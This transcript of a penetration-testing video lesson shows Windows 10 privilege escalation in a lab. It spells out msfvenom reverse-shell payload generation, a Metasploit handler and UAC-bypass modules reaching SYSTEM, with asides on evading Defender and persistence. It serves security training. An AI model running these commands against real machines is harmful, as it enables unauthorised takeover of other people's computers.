[00:00:00] Welcome to part eleven of this module. In this video we're going to be looking at how to escalate our privileges on a Windows system. In prior videos we've seen examples of how to use Metasploit, Armitage and BeEF to gain a foothold against a target. The end goal for most of these attacks is ultimately to gain something like a Meterpreter session or reverse shell where we can control the target and hopefully achieve persistent access. In a perfect world we gain some form of terminal that allows us to throw commands at the victim PC, but then what? Once we have a Meterpreter, where do we go from there? The techniques shown here work against Windows 7, Windows 8 and Windows 8.1. Our target for this video is going to be a Windows 10 64-bit Professional installation running in another VirtualBox. So we will begin by loading up Metasploit, which I have already done to save time. If you need a refresher, you just type service postgresql start followed by msfconsole, keeping in mind that it does take some time to load. In a prior video we learned how to encode our payloads; since the goal of this demonstration is to show how to escalate our privileges once we have a Meterpreter session, we aren't going to bother with encoding or anything fancy right now. Let's just go ahead and generate a generic payload with msfvenom.
[00:01:36] If you're using an older version of Kali, and I'm not really sure why you would be, but I'm just throwing this out there, the command would be msfpayload. That command should be obsolete on all modern versions of the operating system; however, since we've already seen payload generation, we'll make this quick. First we grab our network IP. Keep in mind that if you're doing this over the Internet you'll need to refer back to the video on port forwarding for instructions on how to set that up, if you haven't already. The ifconfig command will show us our current IP address. Mine is going to be ten dot zero zero two thirty; yours will vary. Then we'll generate our payload. Again, we're not doing anything fancy here; we've seen this all before: msfvenom -p windows/meterpreter/reverse_tcp. We're gonna set the LHOST to our current IP address; the LPORT we'll leave at 4444. Again, you can change that if you want. Then -f exe > /root/Desktop/ and I'm going to call this payload3, because I believe it's our third payload, .exe, and press enter. We'll give it a few moments for the payload to generate. I'm going to go through all of this quickly because you've seen it all before.
[00:03:08] This is mostly just a refresher to get us back to where we were in the prior video with Meterpreter. And again, if you want to follow along, the target in this demonstration is Windows 10, but you can use a Windows 8 or a Windows 7 machine; these techniques should work against really any version of Windows going back, I think, to XP. Anything before that, you're on your own. Once this is done we'll find the payload on our desktop and we'll need to transfer it over to our Windows machine. How you do this is up to you, of course. If you're in VirtualBox you could use a shared folder, or possibly a USB thumb drive or something of that nature; it really doesn't matter. But before we open the exploit, let's get our multi handler up and running. So, if you remember, to do this we type use exploit/multi/handler. Pardon my typo there. As always, the exploit appears in red as part of the prompt, indicating that it is now loaded. Like before, we give it our information, so we're going to set LHOST. Again, your IP address will vary. We will set the LPORT, same as before, 4444. And then we type exploit.
[00:04:31] Now, this should all be pretty familiar to you if you've been following along with these videos in order. The reverse TCP handler is now going to be listening for our connection, so as soon as this comes up we're going to flip over to our Windows 10 system and open up the payload, which will then establish the Meterpreter session with our Kali Linux machine. Once over here in our Windows 10 machine, all we have to do is just double click on this payload. Again, it doesn't matter how you get it over here. It may take a moment to load, and we switch back to our Kali machine and we should see that the Meterpreter session is now opening. There we go. Our Meterpreter session is now open. So far so good. If you've been following along with these videos in order you've seen all of this already. But now this is where things get interesting. The first thing we're going to do is we're going to type background and hit return in Meterpreter. This is going to place the Meterpreter process itself into the background so that we can work within Metasploit, but it will keep the connection alive for us to come back to.
[00:05:40] Next we're going to load up a second exploit called bypassuac_injection, so we're gonna type use exploit/windows/local/bypassuac_injection and we're going to do show options. We can see when we list options that it requires a session, so we type sessions and we can see that our Meterpreter session is number one, listed under Id. So we're going to set the session to 1 and show options again. OK, and we're going to run. I made a mistake, but this is somewhat fortunate because it is something that I wanted to touch on anyway. The exploit was expecting a 32-bit target by default. And that is the case with a lot of these exploits, where it defaults to 32-bit and then it breaks when you use it against a 64-bit operating system. And really, how often do you come across a 32-bit system nowadays anyway? It really should default to 64, but since it doesn't, there is usually a way to specify this within the exploit options.
[00:06:58] In this case we're just going to type set payload windows/x64/meterpreter/reverse_tcp (x64 for 64-bit), and then we're going to set target 1 to specify a 64-bit operating system; target 0 would specify 32-bit. And we'll show options again. Now, as we can see, Windows x64 has been specified and our payload now specifies 64-bit. So I'm sorry for that little mistake, but it was handy to illustrate how to do this. So once that's done we're gonna type run. And if you bump into this problem with other exploits or modules, it is important to remember that you have to set the architecture. Sometimes it isn't immediately apparent in the options just how you're supposed to do that, so you may need to read up on the module a bit. Now, do keep in mind that a fully updated Windows Defender is going to catch an unencoded payload and delete it. But again, we've already seen some methods of encoding payloads, and right now we just want to see privilege escalation. OK. So as you can see, I actually had to run the exploit twice, and I'm not really sure why it failed on the first try. Sometimes these exploits will just fail for no reason, and running it twice can sometimes work. In this case it did. In any event, we now have a second Meterpreter session open. So now if we getsystem we can see that we have admin.
[00:08:49] We can also getuid and we can see that we have NT AUTHORITY\SYSTEM. OK, so that was one way of doing things. Now we're going to put this session into the background and then use another module. Before we do that we'll type sessions again. We don't need this many Meterpreters open at once, so let's use -k to kill off the first session. But notice that under the session information you can see which active sessions have NT AUTHORITY\SYSTEM and which don't. This is important if you were running a server or something of that nature and you had a lot of Meterpreter sessions running simultaneously to different computers at once. So let's go ahead and we'll do sessions -k (for kill) and we'll kill the first session. There we go. Now we'll load up our next module, ask, to see if what we want to do next is going to work or not. So we're going to do use exploit/windows/local/ask, show options, and we're going to set session to 2. We're going to set target to 1 for 64-bit, and last but not least we're going to set the technique, which is EXE by default, to PSH, because this will have a better chance of not being detected by Windows Defender. And I'm going to run this, and as I do I'm going to flip over to the Windows 10 side of the virtual system so that you can see what the user sees.
[00:10:36] This module is going to prompt the user for authentication, so in order for it to be successful the user is going to have to click Yes, and that can give the game away. So I'm not saying that this particular approach is the best way of doing things, but if you actually do fool the user into answering the question that the ask module presents the user with, then you will also gain NT AUTHORITY\SYSTEM through that Meterpreter session. So again, this is just a different way of doing it. So I've gone ahead and put us into windowed mode and cleared the screen. We're going to run the module and then we're going to flip over to Windows 10, and hopefully we'll see something happen on this end if the exploit works. Now we can see that this exploit failed due to a timeout, and I'm going to put this one down to Windows 10. However, a PowerShell window did open up on the Windows 10 user desktop, and that wasn't supposed to happen. If we were in Windows 8.1 or Windows 7, and probably Windows XP as well, what would happen is that the user would get a command prompt asking to authorize Windows PowerShell; if the user clicks Yes then the PowerShell will open, but it will open in the background and it will apply only to our Meterpreter session.
[00:11:57] It appears that Windows 10 doesn't have that safeguard, I guess, which has foiled the exploit, because here we just have a blank PowerShell opening up in the user's face, which is not useful to us. So this particular exploit has failed, but that's all right. This is why we test these things ahead of time. I admit I'm a little bit taken by surprise that this exploit didn't work against Windows 10, but that can happen. Now, fortunately we have a lot more exploits to choose from. I've used ask very successfully against Windows 8 and Windows 7, so not sure what happened there, but we'll try use exploit/windows/local/bypassuac, and this time we're going to press tab twice for auto completion, and just like in recon-ng that's going to pull up all of the potential ways that we could complete this path. These are all approaches that we can take; some may work, and like the ask module that we just saw, some may not. So it's always important to test these things ahead of time. Let's try the bypassuac_eventvwr, so we'll do _eventvwr and we're going to do show options.
[00:13:25] We need to specify a session, which is still 2 in my case; yours will vary. So we'll set session 2, and we will once again set the payload to windows/x64/meterpreter/reverse_tcp. We'll set target 1 and we'll show the options. OK, so now we're set up against Windows x64. Everything else: we'd set the LHOST (ifconfig if necessary); set LHOST, in my case it's ten dot zero dot zero one forty five; show options again; ls; and we'll once again getuid. The exploit has worked; this new session has NT AUTHORITY\SYSTEM. We can also do getsystem and we have admin. OK. All right, so that covers a few basic examples of how to get a Meterpreter session with elevated privileges, and there are obviously more modules that you can try, as you saw, and they all work essentially the same way. Of course, a fully updated operating system is going to be more resistant, so you do need to be careful if you wish to avoid detection. Each module is pretty much going to have the same options: you'll need to set the session, you'll need to set the target, you'll probably need to set the LHOST as well and the LPORT. Remember you'll need to use port forwarding if you're doing this over the Internet. And I think, last but not least, I'll point out that if you wish to switch between sessions you would just type sessions -i and then the session number.
[00:15:38] So if you have Meterpreter sessions in the background, for example session three, typing that and pressing Enter would reactivate Meterpreter session three. So that's just something to keep in mind. And finally, if you come across a module without clear instructions on how to set the target architecture, or the payload, or really any other option for that matter, just do a quick search with the module name and the parameter that you're having trouble with, and you should be able to find numerous syntax examples. With an NT AUTHORITY\SYSTEM Meterpreter session you can do just about anything on the target machine without it being visible to the end user, at least within reason. Once you have authority you can work on establishing a persistent foothold on the target computer. As always, practice makes perfect; playing around with these techniques in virtual systems is really the best way to see what works and what doesn't. And as always, never use anything shown in these videos against any target that you do not have written permission from the owner to penetration test. Be lawful and ethical at all times. Thank you, and I'll see you in the next lesson.